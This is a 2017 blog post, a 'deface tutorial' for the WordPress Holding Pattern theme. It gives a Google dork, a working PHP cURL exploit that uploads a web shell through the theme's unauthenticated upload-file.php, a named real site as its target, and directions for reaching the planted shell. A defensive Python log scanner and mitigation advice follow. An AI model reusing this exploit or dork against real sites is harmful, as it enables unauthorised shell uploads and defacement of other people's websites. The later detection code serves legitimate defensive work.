Friday, 27 January 2017

Deface tutorial: Wordpress Themes holding_pattern

- Exploit Title: Wordpress Themes Holding Pattern
- Google Dork 1 : inurl:/wp-content/themes/holding_pattern/
- Exploit : /wp-content/themes/holding_pattern/admin/upload-file.php

<?php
$uploadfile="chaYankVica.php";
$target = "http://www.shani-indira.org/wp-content/themes/holding_pattern/admin/upload-file.php";
$domain = explode("/", $target);
$server_addr = gethostbyname($domain[2]);
$ch = curl_init($target."/wp-content/themes/holding_pattern/admin/upload-file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_VERBOSE, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,array(md5($server_addr)=>"@$uploadfile",'upload_path'=>base64_encode('.')));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
====================================================================================================
Just dork as usual.
This time I already have a live target.
Append the exploit path; vuln = blank page.
Don't forget to keep the exploiter and the shell in the same directory:
xampp/php/
If the output says success, the shell was uploaded.
How do you access it?
/wp-content/themes/holding_pattern/uploads/shell.php
The site sucks :'v
That's all, thanks.
-BERDENDANGC0DE

./Mr.greetz69
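
For defenders, the two paths in this post are what to look for in web-server access logs: a POST to the theme's upload-file.php, and any .php file served from the theme's uploads directory. The following Python is an added example, not part of the original post; it assumes combined-format access logs, and the function name and sample log lines are constructed for illustration.

```python
import re

# Paths named in the post: the theme's upload handler and the directory it writes to.
UPLOAD_ENDPOINT = "/wp-content/themes/holding_pattern/admin/upload-file.php"
UPLOAD_DIR = "/wp-content/themes/holding_pattern/uploads/"

# Assumed common/combined log format: ip - - [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_abuse(lines):
    """Return findings as (kind, client_ip, timestamp, path) tuples."""
    findings, uploaders = [], set()  # uploaders: clients that POSTed to the handler
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method = m["ip"], m["ts"], m["method"]
        path = m["path"].split("?", 1)[0]  # drop the query string
        probe = path.lower()
        if method == "POST" and UPLOAD_ENDPOINT in probe:
            uploaders.add(ip)
            findings.append(("upload_attempt", ip, ts, path))
        elif UPLOAD_DIR in probe and probe.endswith(".php") and m["status"] == "200":
            # A PHP file answering from an upload directory should never happen.
            kind = "script_run_after_upload" if ip in uploaders else "script_in_upload_dir"
            findings.append((kind, ip, ts, path))
    return findings

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Jan/2017:10:01:02 +0000] "GET /wp-content/themes/holding_pattern/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [27/Jan/2017:10:02:10 +0000] "POST /wp-content/themes/holding_pattern/admin/upload-file.php HTTP/1.1" 200 12 "-" "curl"',
    '203.0.113.9 - - [27/Jan/2017:10:02:31 +0000] "GET /wp-content/themes/holding_pattern/uploads/example.php HTTP/1.1" 200 845 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Jan/2017:10:05:00 +0000] "GET /wp-content/themes/holding_pattern/uploads/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [27/Jan/2017:10:06:00 +0000] "GET /wp-content/themes/holding_pattern/uploads/example.php?x=1 HTTP/1.1" 200 845 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding)
```

A hit on the upload handler alone is only an attempt; confirm by checking the theme's uploads directory on disk for files that are not images. Removing the theme or denying PHP execution in that directory closes the path the post relies on.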

Copyright @ 2013 BerdendangC0de.